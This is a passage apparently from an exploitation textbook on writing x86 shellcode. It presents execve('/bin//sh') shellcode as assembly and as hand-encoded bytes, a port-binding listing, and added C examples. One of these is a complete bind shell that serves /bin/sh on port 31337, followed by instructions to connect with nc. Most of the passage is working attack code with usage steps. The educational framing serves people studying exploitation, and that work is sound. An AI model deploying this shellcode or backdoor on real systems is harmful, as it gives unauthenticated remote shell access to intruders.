push BYTE 11 ; push 11 to the stack.
pop eax ; pop the dword of 11 into eax.
push ecx ; push some nulls for string termination.
push 0x68732f2f ; push "//sh" to the stack.
push 0x6e69622f ; push "/bin" to the stack.
mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.
push ecx ; push 32-bit null terminator to stack.
mov edx, esp ; This is an empty array for envp.
push ebx ; push string addr to stack above null terminator.
mov ecx, esp ; This is the argv array with string ptr.
int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])
The syntax for pushing a single byte requires the size to be declared.
Valid sizes are BYTE for one byte, WORD for two bytes, and DWORD for four bytes.
These sizes can be implied from register widths, so moving into the AL
register implies the BYTE size. While it's not necessary to use a size in all
situations, it doesn't hurt and can help readability.
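The reason the listing pushes 11 as a BYTE and then pops it, instead of writing mov eax, 11, is the byte encoding: the immediate form of mov eax is five bytes, three of them zero, and a zero byte ends the payload when it is copied by a string function. The following C program is an added example, not code from the book: it hand-assembles the instructions listed above (my own encoding, assuming ecx was zeroed by an earlier instruction that is not on this page), counts NUL bytes in the result, and simulates the three pushes to show that the two little-endian dwords really do land on the stack as "/bin//sh" followed by the pushed terminator.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* x86-32 encoding of the listing above (hand-assembled for this example;
 * assumes ecx already holds zero, e.g. from an earlier "xor ecx, ecx"). */
static const unsigned char execve_shellcode[] = {
    0x6a, 0x0b,                     /* push BYTE 11              */
    0x58,                           /* pop eax                   */
    0x51,                           /* push ecx  (NUL terminator) */
    0x68, 0x2f, 0x2f, 0x73, 0x68,   /* push 0x68732f2f  "//sh"   */
    0x68, 0x2f, 0x62, 0x69, 0x6e,   /* push 0x6e69622f  "/bin"   */
    0x89, 0xe3,                     /* mov ebx, esp              */
    0x51,                           /* push ecx  (envp[0] = NULL) */
    0x89, 0xe2,                     /* mov edx, esp              */
    0x53,                           /* push ebx  (argv[0])       */
    0x89, 0xe1,                     /* mov ecx, esp              */
    0xcd, 0x80                      /* int 0x80                  */
};
#define EXECVE_SHELLCODE_LEN (sizeof execve_shellcode)

/* The naive alternative, "mov eax, 11": five bytes, three of them zero. */
static const unsigned char mov_eax_11[] = { 0xb8, 0x0b, 0x00, 0x00, 0x00 };

/* Count zero bytes; any NUL truncates a payload copied with strcpy-like calls. */
size_t count_null_bytes(const unsigned char *buf, size_t len) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0)
            n++;
    return n;
}

/* Simulate the three pushes that build the path.  A push stores a 32-bit
 * little-endian value at esp-4, so pushing 0, "//sh", "/bin" in that order
 * leaves "/bin//sh\0" at the final esp.  out must hold at least 9 bytes. */
void simulate_path_pushes(char out[9]) {
    unsigned char stack[16];
    size_t sp = sizeof stack;                     /* stack grows downward */
    const uint32_t pushes[] = { 0x00000000u, 0x68732f2fu, 0x6e69622fu };
    for (size_t i = 0; i < 3; i++) {
        sp -= 4;
        stack[sp + 0] = (unsigned char)(pushes[i]);
        stack[sp + 1] = (unsigned char)(pushes[i] >> 8);
        stack[sp + 2] = (unsigned char)(pushes[i] >> 16);
        stack[sp + 3] = (unsigned char)(pushes[i] >> 24);
    }
    memcpy(out, &stack[sp], 9);                   /* what ebx points at */
}

/* 1 if the simulated stack holds exactly "/bin//sh" (NUL-terminated). */
int path_is_bin_sh(void) {
    char path[9];
    simulate_path_pushes(path);
    return strcmp(path, "/bin//sh") == 0;
}

int main(void) {
    char path[9];
    simulate_path_pushes(path);
    printf("path built on the stack: \"%s\"\n", path);
    printf("push/pop shellcode: %zu bytes, %zu NUL bytes\n", EXECVE_SHELLCODE_LEN,
           count_null_bytes(execve_shellcode, EXECVE_SHELLCODE_LEN));
    printf("mov eax, 11: %zu bytes, %zu NUL bytes\n", sizeof mov_eax_11,
           count_null_bytes(mov_eax_11, sizeof mov_eax_11));
    return 0;
}
```

The doubled slash in "/bin//sh" is what makes the path exactly eight bytes, two dwords, so no NUL needs to be embedded in the instruction stream; the kernel treats "//" as "/", and the only zero bytes involved come from ecx at run time.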
Port-Binding Shellcode
When exploiting a remote program, the shellcode we've designed so far won't
work. The injected shellcode needs to communicate over the network to
deliver an interactive root prompt. Port-binding shellcode will bind the shell
to a network port where it listens for incoming connections. In the previous
chapter, we used this kind of shellcode to exploit the tinyweb server. The
following C code binds to port 31337 and listens for a TCP connection.
bind_port.c
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void) {
   int sockfd, new_sockfd;  // Listen on sockfd, new connection on new_sockfd
   struct sockaddr_in host_addr, client_addr;   // My address information
   socklen_t sin_size;
   int yes=1;

   sockfd = socket(PF_INET, SOCK_STREAM, 0);

   host_addr.sin_family = AF_INET;         // Host byte order
   host_addr.sin_port = htons(31337);      // Short, network byte order
   host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.
   memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

   bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));

   listen(sockfd, 4);

   // The listening socket is ready; the rest of the program (not shown here)
   // accepts a connection and hands it to a shell.
   return 0;
}
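The listing stops at listen(), so as an added example (my code, not the book's) here is the complete sequence a port-binding shell needs: socket, bind, listen, accept, then dup2() of the accepted socket onto stdin, stdout and stderr before exec of /bin/sh, so that the remote peer's bytes become the shell's input and the shell's output goes back over the wire. The unused "int yes=1" in the listing is the conventional argument for SO_REUSEADDR, which this version actually applies so the port can be rebound while a previous connection lingers in TIME_WAIT. The port 31337 and /bin/sh are taken from the text; error handling and the null-byte count are additions for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Fill a sockaddr_in the way the listing does: AF_INET, port in network
 * byte order, INADDR_ANY, and the padding zeroed (memset covers sin_zero). */
void build_host_addr(struct sockaddr_in *addr, uint16_t port) {
    memset(addr, 0, sizeof *addr);
    addr->sin_family = AF_INET;
    addr->sin_port = htons(port);
    addr->sin_addr.s_addr = INADDR_ANY;
}

/* 1 if build_host_addr() produced the fields the listing sets, else 0. */
int host_addr_is_sane(uint16_t port) {
    struct sockaddr_in a;
    build_host_addr(&a, port);
    return a.sin_family == AF_INET && ntohs(a.sin_port) == port &&
           a.sin_addr.s_addr == INADDR_ANY;
}

/* How many zero bytes the struct contains.  This matters when the same
 * structure must be produced by shellcode: INADDR_ANY and sin_zero are all
 * NUL, so a shellcode version has to generate them at run time (for example
 * from a zeroed register) rather than embed them in the instruction stream. */
size_t host_addr_null_bytes(uint16_t port) {
    struct sockaddr_in a;
    build_host_addr(&a, port);
    const unsigned char *p = (const unsigned char *)&a;
    size_t n = 0;
    for (size_t i = 0; i < sizeof a; i++)
        if (p[i] == 0)
            n++;
    return n;
}

/* socket -> SO_REUSEADDR -> bind -> listen.  Returns the listening
 * descriptor, or -1 on failure. */
int make_listener(uint16_t port, int backlog) {
    struct sockaddr_in host_addr;
    int yes = 1;
    int sockfd = socket(PF_INET, SOCK_STREAM, 0);
    if (sockfd < 0)
        return -1;
    setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof yes);
    build_host_addr(&host_addr, port);
    if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof host_addr) < 0 ||
        listen(sockfd, backlog) < 0) {
        close(sockfd);
        return -1;
    }
    return sockfd;
}

/* Accept one connection, point fds 0, 1 and 2 at it, and replace this
 * process with a shell.  Returns only if something failed. */
int serve_shell(int listen_fd) {
    struct sockaddr_in client_addr;
    socklen_t sin_size = sizeof client_addr;
    int new_sockfd = accept(listen_fd, (struct sockaddr *)&client_addr, &sin_size);
    if (new_sockfd < 0)
        return -1;
    close(listen_fd);                 /* the shell has no use for it */
    for (int fd = 0; fd < 3; fd++)    /* stdin, stdout, stderr -> socket */
        if (dup2(new_sockfd, fd) < 0)
            return -1;
    if (new_sockfd > 2)
        close(new_sockfd);            /* the three dups keep it open */
    execl("/bin/sh", "sh", (char *)0);
    return -1;                        /* exec failed */
}

int main(void) {
    int listen_fd = make_listener(31337, 4);
    if (listen_fd < 0) { perror("make_listener"); return 1; }
    if (serve_shell(listen_fd) < 0) { perror("serve_shell"); return 1; }
    return 0;
}
```

Run it and connect with nc to port 31337 to get the shell; note that a bind shell is only reachable if the host's firewall allows inbound connections to that port, which is the usual reason a connect-back variant is preferred in practice.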